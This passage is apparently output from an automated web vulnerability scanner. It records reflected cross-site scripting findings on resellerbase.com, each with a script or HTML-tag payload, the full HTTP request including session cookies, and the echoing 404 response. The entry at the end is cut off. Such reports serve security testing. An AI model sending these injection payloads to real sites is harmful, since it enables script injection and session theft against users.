Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 865a4<script>alert(1)</script>5f9b5412b9b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images865a4<script>alert(1)</script>5f9b5412b9b/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images865a4<script>alert(1)</script>5f9b5412b9b/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5309. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2f278<script>alert(1)</script>2ee5466f308 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating2f278<script>alert(1)</script>2ee5466f308/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating2f278<script>alert(1)</script>2ee5466f308/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5310. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload f898a<script>alert(1)</script>7c8489f2f0a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating/search.phpf898a<script>alert(1)</script>7c8489f2f0a?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating/search.phpf898a<script>alert(1)</script>7c8489f2f0a?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5311. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload b97b3<a>19c9550c8a was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchb97b3<a>19c9550c8a&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchb97b3<a>19c9550c8a&opt=2 was not found on this server.</p>
...[SNIP]...

2.5312. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 5c373<a>77574af6728 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...5c373<a>77574af6728&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...5c373<a>77574af6728&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5313. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b13d4<script>alert(1)</script>b6e0ec6c7af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&b13d4<script>alert(1)</script>b6e0ec6c7af=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&b13d4<script>alert(1)</script>b6e0ec6c7af=1 was not found on this server.</p>
...[SNIP]...

2.5314. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ee281<a>643a3079de3 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ee281<a>643a3079de3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ee281<a>643a3079de3 was not found on this server.</p>
...[SNIP]...

2.5315. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5b924<script>alert(1)</script>75c1a900a51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service5b924<script>alert(1)</script>75c1a900a51/software-scripts/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service5b924<script>alert(1)</script>75c1a900a51/software-scripts/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5316. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ebbbc<script>alert(1)</script>c7f4cbb86bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scriptsebbbc<script>alert(1)</script>c7f4cbb86bb/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scriptsebbbc<script>alert(1)</script>c7f4cbb86bb/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5317. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 53d5a<script>alert(1)</script>7c59e25e65f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes53d5a<script>alert(1)</script>7c59e25e65f/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes53d5a<script>alert(1)</script>7c59e25e65f/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5318. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9ffa3<script>alert(1)</script>d5c40e82aa2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos9ffa3<script>alert(1)</script>d5c40e82aa2/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos9ffa3<script>alert(1)</script>d5c40e82aa2/images/review/ was not found on this server.</p>
...[SNIP]...

2.5319. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 537ac<script>alert(1)</script>1ceaf0f9082 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images537ac<script>alert(1)</script>1ceaf0f9082/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images537ac<script>alert(1)</script>1ceaf0f9082/review/ was not found on this server.</p>
...[SNIP]...

2.5320. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 44350<script>alert(1)</script>dd95a33fe0b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/review44350<script>alert(1)</script>dd95a33fe0b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/review44350<script>alert(1)</script>dd95a33fe0b/ was not found on this server.</p>
...[SNIP]...

2.5321. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f21b1<script>alert(1)</script>8b4fa7516cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/review/?f21b1<script>alert(1)</script>8b4fa7516cf=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/review/?f21b1<script>alert(1)</script>8b4fa7516cf=1 was not found on this server.</p>
...[SNIP]...

2.5322. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bbacf<script>alert(1)</script>16f8715317e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicebbacf<script>alert(1)</script>16f8715317e/software-scripts/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicebbacf<script>alert(1)</script>16f8715317e/software-scripts/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5323. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3da6a<script>alert(1)</script>3d4fe3ed74f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts3da6a<script>alert(1)</script>3d4fe3ed74f/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts3da6a<script>alert(1)</script>3d4fe3ed74f/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5324. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97bd4<script>alert(1)</script>fdb410fb3cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes97bd4<script>alert(1)</script>fdb410fb3cd/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes97bd4<script>alert(1)</script>fdb410fb3cd/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5325. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f0692<script>alert(1)</script>ecbf09e32fe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmosf0692<script>alert(1)</script>ecbf09e32fe/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmosf0692<script>alert(1)</script>ecbf09e32fe/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5326. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/0.gif

Issue detail

